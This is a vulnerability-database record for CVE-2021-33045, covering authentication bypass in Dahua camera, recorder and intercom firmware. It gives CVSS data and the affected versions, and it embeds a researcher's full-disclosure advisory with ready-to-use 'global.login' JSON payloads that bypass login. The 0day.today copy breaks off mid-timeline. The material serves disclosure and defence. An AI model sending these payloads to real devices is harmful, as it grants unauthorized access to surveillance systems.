Description
The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
Affected Software
Related
{"id": "CVE-2021-33045", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-33045", "description": "The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.", "published": "2021-09-15T22:15:00", "modified": "2021-12-02T13:49:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33045", "reporter": "cybersecurity@dahuatech.com", "references": ["https://www.dahuasecurity.com/support/cybersecurity/details/957", "http://seclists.org/fulldisclosure/2021/Oct/13", "http://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html"], "cvelist": ["CVE-2021-33045"], "immutableFields": [], "lastseen": "2022-03-23T18:34:51", "viewCount": 63, "enchantments": {"dependencies": {"references": [{"type": "githubexploit", "idList": ["027E0C4A-98F7-5981-ABE2-D15DCFFFBA42", "0B349C81-80AE-5B59-B4E6-1E6703F0F5A8"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164423"]}, {"type": "zdt", "idList": ["1337DAY-ID-36859"]}], "rev": 4}, "score": {"value": 5.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "githubexploit", "idList": ["027E0C4A-98F7-5981-ABE2-D15DCFFFBA42", "0B349C81-80AE-5B59-B4E6-1E6703F0F5A8"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164423"]}, {"type": "zdt", "idList": ["1337DAY-ID-36859"]}]}, "exploitation": null, "vulnersScore": 5.9}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/o:dahuasecurity:xvr-4x04_firmware:-"], "cpe23": ["cpe:2.3:o:dahuasecurity:xvr-4x04_firmware:-:*:*:*:*:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "dahuasecurity:ipc-hum7xxx_firmware", "version": "2.820.0000000.5.r.210705", "operator": "lt", "name": "dahuasecurity ipc-hum7xxx firmware"}, {"cpeName": "dahuasecurity:ipc-hx3xxx_firmware", "version": "2.800.0000000.29.r.210630", "operator": "lt", "name": "dahuasecurity ipc-hx3xxx firmware"}, {"cpeName": "dahuasecurity:ipc-hx5xxx_firmware", "version": "2.820.0000000.5.r.210705", "operator": "lt", "name": "dahuasecurity ipc-hx5xxx firmware"}, {"cpeName": "dahuasecurity:nvr-1xxx_firmware", "version": "4.001.0000005.1.r.210709", "operator": "lt", "name": "dahuasecurity nvr-1xxx firmware"}, {"cpeName": "dahuasecurity:nvr-2xxx_firmware", "version": "4.001.0000000.1.r.210710", "operator": "lt", "name": "dahuasecurity nvr-2xxx firmware"}, {"cpeName": "dahuasecurity:nvr-4xxx_firmware", "version": "4.001.0000005.1.r.210713", "operator": "lt", "name": "dahuasecurity nvr-4xxx firmware"}, {"cpeName": "dahuasecurity:nvr-5xxx_firmware", "version": "4.001.0000000.0.r.210710", "operator": "lt", "name": "dahuasecurity nvr-5xxx firmware"}, {"cpeName": "dahuasecurity:nvr-6xx_firmware", "version": "4.001.0000001.1.r.210716", "operator": "lt", "name": "dahuasecurity nvr-6xx firmware"}, {"cpeName": "dahuasecurity:vth-542xh_firmware", "version": "4.500.0000002.0.r.210715", "operator": "lt", "name": "dahuasecurity vth-542xh firmware"}, {"cpeName": "dahuasecurity:vto-65xxx_firmware", "version": "4.300.0000004.0.r.210715", "operator": "lt", "name": "dahuasecurity vto-65xxx firmware"}, {"cpeName": "dahuasecurity:vto-75x95x_firmware", "version": "4.300.0000003.0.r.210714", "operator": "lt", "name": "dahuasecurity vto-75x95x firmware"}, {"cpeName": "dahuasecurity:xvr-4x04_firmware", "version": "-", "operator": "eq", "name": "dahuasecurity xvr-4x04 firmware"}, {"cpeName": "dahuasecurity:xvr-4x08_firmware", "version": "4.001.0000001.1.r.210709", "operator": "lt", "name": "dahuasecurity xvr-4x08 firmware"}, {"cpeName": "dahuasecurity:xvr-4x04_firmware", "version": "4.001.0000001.1.r.210709", "operator": "lt", "name": "dahuasecurity xvr-4x04 firmware"}, {"cpeName": "dahuasecurity:xvr-5x04_firmware", "version": "4.001.0000003.1.r.210710", "operator": "lt", "name": "dahuasecurity xvr-5x04 firmware"}, {"cpeName": "dahuasecurity:xvr-5x08_firmware", "version": "4.001.0000003.1.r.210710", "operator": "lt", "name": "dahuasecurity xvr-5x08 firmware"}, {"cpeName": "dahuasecurity:xvr-5x16_firmware", "version": "4.001.0000003.1.r.210710", "operator": "lt", "name": "dahuasecurity xvr-5x16 firmware"}, {"cpeName": "dahuasecurity:xvr-7x16_firmware", "version": "4.001.0000003.1.r.210710", "operator": "lt", "name": "dahuasecurity xvr-7x16 firmware"}, {"cpeName": "dahuasecurity:xvr-7x32_firmware", "version": "4.001.0000003.1.r.210710", "operator": "lt", "name": "dahuasecurity xvr-7x32 firmware"}], "affectedConfiguration": [{"name": "dahuasecurity ipc-hum7xxx", "cpeName": "dahuasecurity:ipc-hum7xxx", "version": "-", "operator": "eq"}, {"name": "dahuasecurity ipc-hx3xxx", "cpeName": "dahuasecurity:ipc-hx3xxx", "version": "-", "operator": "eq"}, {"name": "dahuasecurity ipc-hx5xxx", "cpeName": "dahuasecurity:ipc-hx5xxx", "version": "-", "operator": "eq"}, {"name": "dahuasecurity nvr-1xxx", "cpeName": "dahuasecurity:nvr-1xxx", "version": "-", "operator": "eq"}, {"name": "dahuasecurity nvr-2xxx", "cpeName": "dahuasecurity:nvr-2xxx", "version": "-", "operator": "eq"}, {"name": "dahuasecurity nvr-4xxx", "cpeName": "dahuasecurity:nvr-4xxx", "version": "-", "operator": "eq"}, {"name": "dahuasecurity nvr-5xxx", "cpeName": "dahuasecurity:nvr-5xxx", "version": "-", "operator": "eq"}, {"name": "dahuasecurity nvr-6xx", "cpeName": "dahuasecurity:nvr-6xx", "version": "-", "operator": "eq"}, {"name": "dahuasecurity vth-542xh", "cpeName": "dahuasecurity:vth-542xh", "version": "-", "operator": "eq"}, {"name": "dahuasecurity vto-65xxx", "cpeName": "dahuasecurity:vto-65xxx", "version": "-", "operator": "eq"}, {"name": "dahuasecurity vto-75x95x", "cpeName": "dahuasecurity:vto-75x95x", "version": "-", "operator": "eq"}, {"name": "dahuasecurity xvr-4x04", "cpeName": "dahuasecurity:xvr-4x04", "version": "-", "operator": "eq"}, {"name": "dahuasecurity xvr-4x08", "cpeName": "dahuasecurity:xvr-4x08", "version": "-", "operator": "eq"}, {"name": "dahuasecurity xvr-5x04", "cpeName": "dahuasecurity:xvr-5x04", "version": "-", "operator": "eq"}, {"name": "dahuasecurity xvr-5x08", "cpeName": "dahuasecurity:xvr-5x08", "version": "-", "operator": "eq"}, {"name": "dahuasecurity xvr-5x16", "cpeName": "dahuasecurity:xvr-5x16", "version": "-", "operator": "eq"}, {"name": "dahuasecurity xvr-7x16", "cpeName": "dahuasecurity:xvr-7x16", "version": "-", "operator": "eq"}, {"name": "dahuasecurity xvr-7x32", "cpeName": "dahuasecurity:xvr-7x32", "version": "-", "operator": "eq"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:2.820.0000000.5.r.210705:*:*:*:*:*:*:*", "versionEndExcluding": "2.820.0000000.5.r.210705", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hum7xxx:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx3xxx_firmware:2.800.0000000.29.r.210630:*:*:*:*:*:*:*", "versionEndExcluding": "2.800.0000000.29.r.210630", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx3xxx:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx5xxx_firmware:2.820.0000000.5.r.210705:*:*:*:*:*:*:*", "versionEndExcluding": "2.820.0000000.5.r.210705", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx5xxx:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-1xxx_firmware:4.001.0000005.1.r.210709:*:*:*:*:*:*:*", "versionEndExcluding": "4.001.0000005.1.r.210709", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-1xxx:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-2xxx_firmware:4.001.0000000.1.r.210710:*:*:*:*:*:*:*", "versionEndExcluding": "4.001.0000000.1.r.210710", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-2xxx:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-4xxx_firmware:4.001.0000005.1.r.210713:*:*:*:*:*:*:*", "versionEndExcluding": "4.001.0000005.1.r.210713", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-4xxx:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-5xxx_firmware:4.001.0000000.0.r.210710:*:*:*:*:*:*:*", "versionEndExcluding": "4.001.0000000.0.r.210710", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-5xxx:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr-6xx_firmware:4.001.0000001.1.r.210716:*:*:*:*:*:*:*", "versionEndExcluding": "4.001.0000001.1.r.210716", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr-6xx:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:vth-542xh_firmware:4.500.0000002.0.r.210715:*:*:*:*:*:*:*", "versionEndExcluding": "4.500.0000002.0.r.210715", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:vth-542xh:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-65xxx_firmware:4.300.0000004.0.r.210715:*:*:*:*:*:*:*", "versionEndExcluding": "4.300.0000004.0.r.210715", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-65xxx:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-75x95x_firmware:4.300.0000003.0.r.210714:*:*:*:*:*:*:*", "versionEndExcluding": "4.300.0000003.0.r.210714", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-75x95x:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-4x04_firmware:-:*:*:*:*:*:*:*", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-4x04:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-4x08_firmware:4.001.0000001.1.r.210709:*:*:*:*:*:*:*", "versionEndExcluding": "4.001.0000001.1.r.210709", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-4x08:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-4x04_firmware:4.001.0000001.1.r.210709:*:*:*:*:*:*:*", "versionEndExcluding": "4.001.0000001.1.r.210709", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-4x04:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-5x04_firmware:4.001.0000003.1.r.210710:*:*:*:*:*:*:*", "versionEndExcluding": "4.001.0000003.1.r.210710", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-5x04:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-5x08_firmware:4.001.0000003.1.r.210710:*:*:*:*:*:*:*", "versionEndExcluding": "4.001.0000003.1.r.210710", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-5x08:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-5x16_firmware:4.001.0000003.1.r.210710:*:*:*:*:*:*:*", "versionEndExcluding": "4.001.0000003.1.r.210710", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-5x16:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-7x16_firmware:4.001.0000003.1.r.210710:*:*:*:*:*:*:*", "versionEndExcluding": "4.001.0000003.1.r.210710", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-7x16:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}, {"operator": "AND", "children": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-7x32_firmware:4.001.0000003.1.r.210710:*:*:*:*:*:*:*", "versionEndExcluding": "4.001.0000003.1.r.210710", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": false, "cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-7x32:-:*:*:*:*:*:*:*", "cpe_name": []}]}], "cpe_match": []}]}, "extraReferences": [{"url": "https://www.dahuasecurity.com/support/cybersecurity/details/957", "name": "https://www.dahuasecurity.com/support/cybersecurity/details/957", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2021/Oct/13", "name": "20211005 [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)", "refsource": "FULLDISC", "tags": ["Exploit", "Mailing List", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html", "name": "http://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"githubexploit": [{"lastseen": "2022-06-01T23:45:40", "description": "# cve-2021-33045\n\n\u901a\u8fc7\u4fee\u6539\u6d4f\u89c8\u5668\u53d1\u5f80```/RPC2_Login```\u7684\u6570\u636e\u5305\u767b\u5f55\u6444\u50cf\u5934\u7684\u7f51\u9875\u3002\n\n\u8fd9\u91cc\u91c7\u7528m...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T15:11:48", "type": "githubexploit", "title": "Exploit for Improper Authentication in Dahuasecurity Ipc-Hum7Xxx Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33045"], "modified": "2022-06-01T16:03:58", "id": "027E0C4A-98F7-5981-ABE2-D15DCFFFBA42", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:05:38", "description": "# DahuaLoginBypass\nChrome extension that uses vulnerability [CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T22:08:47", "type": "githubexploit", "title": "Exploit for Improper Authentication in Dahuasecurity Ipc-Hum7Xxx Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33044", "CVE-2021-33045"], "modified": "2022-03-23T13:54:25", "id": "0B349C81-80AE-5B59-B4E6-1E6703F0F5A8", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "packetstorm": [{"lastseen": "2021-10-06T17:15:26", "description": "", "cvss3": {}, "published": "2021-10-06T00:00:00", "type": "packetstorm", "title": "Dahua Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-33044", "CVE-2021-33045"], "modified": "2021-10-06T00:00:00", "id": "PACKETSTORM:164423", "href": "https://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html", "sourceData": "`[STX] \n \nSubject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045) \n \nAttack vector: Remote \nAuthentication: Anonymous (no credentials needed) \nResearcher: bashis <mcw noemail eu> (2021) \nLimited Disclosure: September 6, 2021 \nFull Disclosure: October 6, 2021 \nPoC: https://github.com/mcw0/DahuaConsole \n \n-=[Dahua]=- \nAdvisory: https://www.dahuasecurity.com/support/cybersecurity/details/957 \nFirmware: https://www.dahuasecurity.com/support/downloadCenter/firmware \n \n-=[Timeline]=- \nJune 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com) \nJune 17, 2021: Sent reminder to Dahua PSIRT \nJune 18, 2021: Asked IPVM for help to get in contact with Dahua \nJune 18, 2021: Received ACK from IPVM, told they sent note to Dahua \nJune 19, 2021: ACK received from Dahua PSIRT, asked for additional details \nJune 19, 2021: Additional details including PoC sent \nJune 21, 2021: ACK received, vulnerabilites confirmed \nJune 23, 2021: Dahua PSIRT asked for \"coordinated disclosure\" \nJune 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now \nJune 24, 2021: Received CVE-2021-33044, I asked about the second CVE \nJuly 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for \"coordinated disclosure\" \nJuly 04, 2021: Confirmed \"coordinated disclosure\", once again \nJuly 05, 2021: Dahua PSIRT tried convince me for \"Full Disclosure\" for vendor only, and \"Limited Disclosure\" for outside world \nJuly 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before \"Limited Disclosure\" September 6, 2021. \n\"Full Disclosure\" will be October 6, 2021, \nAugust 30, 2021: Dahua PSIRT asked to read my \"Limited Disclosure\" note \nAugust 30, 2021: Sent my \"Limited Disclosure\" note \nSeptember 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates \nSeptember 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices \nSeptember 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware \nSeptember 2, 2021: Refused to provide details, as I do expect me to find firmware on their website \nSeptember 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches \nSeptember 6, 2021: Limited Disclosure \nOctober 6, 2021: Full Disclosure \n \n \n-=[NetKeyboard Vulnerability]=- \n \nCVE-2021-33044 \n \nVulnerability: \n\"clientType\": \"NetKeyboard\", \nVulnerable device types: IPC/VTH/VTO (tested) \nVulnerable Firmware: Those devices who do not support \"NetKeyboard\" functionality (older than June 2021) \nProtocol: DHIP and HTTP/HTTPS \n \nDetails: \nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence will simply bypass authentication. \n \nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":<sessionID>} \n \n[Example] \n{ \n\"method\": \"global.login\", \n\"params\": \n{ \n\"userName\": \"admin\", \n\"loginType\": \"Direct\", \n\"clientType\": \"NetKeyboard\", \n\"authorityType\": \"Default\", \n\"passwordType\": \"Default\", \n\"password\": \"Not Used\" \n}, \n\"id\": 1, \n\"session\": 0 \n} \n \n-=[Loopback Vulnerability]=- \n \nCVE-2021-33045 \n \nVulnerability: \n\"ipAddr\": \"127.0.0.1\", \n\"loginType\": \"Loopback\", \n\"clientType\": \"Local\", \n \nVulnerable device types: IPC/VTH/VTO/NVR/DVR (tested) \nVulnerable Firmware: Firmware version older than beginning/mid 2020. \nProtocol: DHIP \n \nDetails: \nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence pretends that the login request comes from \"loopback\" and will therefore bypass legitimate authentication. \n \nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":<sessionID>} \n \n \n[Example] \nRandom MD5 with l/p: admin/admin \n{ \n\"method\": \"global.login\", \n\"params\": \n{ \n\"userName\": \"admin\", \n\"ipAddr\": \"127.0.0.1\", \n\"loginType\": \"Loopback\", \n\"clientType\": \"Local\", \n\"authorityType\": \"Default\", \n\"passwordType\": \"Default\", \n\"password\": \"[REDACTED]\" \n}, \n\"id\": 1, \n\"session\": 0 \n} \n \nPlain text with l/p: admin/admin \n{ \n\"method\": \"global.login\", \n\"params\": \n{ \n\"userName\": \"admin\", \n\"ipAddr\": \"127.0.0.1\", \n\"loginType\": \"Loopback\", \n\"clientType\": \"Local\", \n\"authorityType\": \"Default\", \n\"passwordType\": \"Plain\", \n\"password\": \"admin\" \n}, \n\"id\": 1, \n\"session\": 0 \n} \n \n[ETX] \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164423/dahua-bypass.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-20T06:08:34", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T00:00:00", "type": "zdt", "title": "Dahua Authentication Bypass Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33045", "CVE-2021-33044"], "modified": "2021-10-06T00:00:00", "id": "1337DAY-ID-36859", "href": "https://0day.today/exploit/description/36859", "sourceData": "[STX]\n\nSubject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)\n\nAttack vector: Remote\nAuthentication: Anonymous (no credentials needed)\nResearcher: bashis <mcw noemail eu> (2021)\nLimited Disclosure: September 6, 2021\nFull Disclosure: October 6, 2021\nPoC: https://github.com/mcw0/DahuaConsole\n\n-=[Dahua]=-\nAdvisory: https://www.dahuasecurity.com/support/cybersecurity/details/957\nFirmware: https://www.dahuasecurity.com/support/downloadCenter/firmware\n\n-=[Timeline]=-\nJune 13, 2021: Initiated contact with Dahua PSIRT ([email\u00a0protected])\nJune 17, 2021: Sent reminder to Dahua PSIRT\nJune 18, 2021: Asked IPVM for help to get in contact with Dahua\nJune 18, 2021: Received ACK from IPVM, told they sent note to Dahua\nJune 19, 2021: ACK received from Dahua PSIRT, asked for additional details\nJune 19, 2021: Additional details including PoC sent\nJune 21, 2021: ACK received, vulnerabilites confirmed\nJune 23, 2021: Dahua PSIRT asked for \"coordinated disclosure\"\nJune 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now\nJune 24, 2021: Received CVE-2021-33044, I asked about the second CVE\nJuly 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for 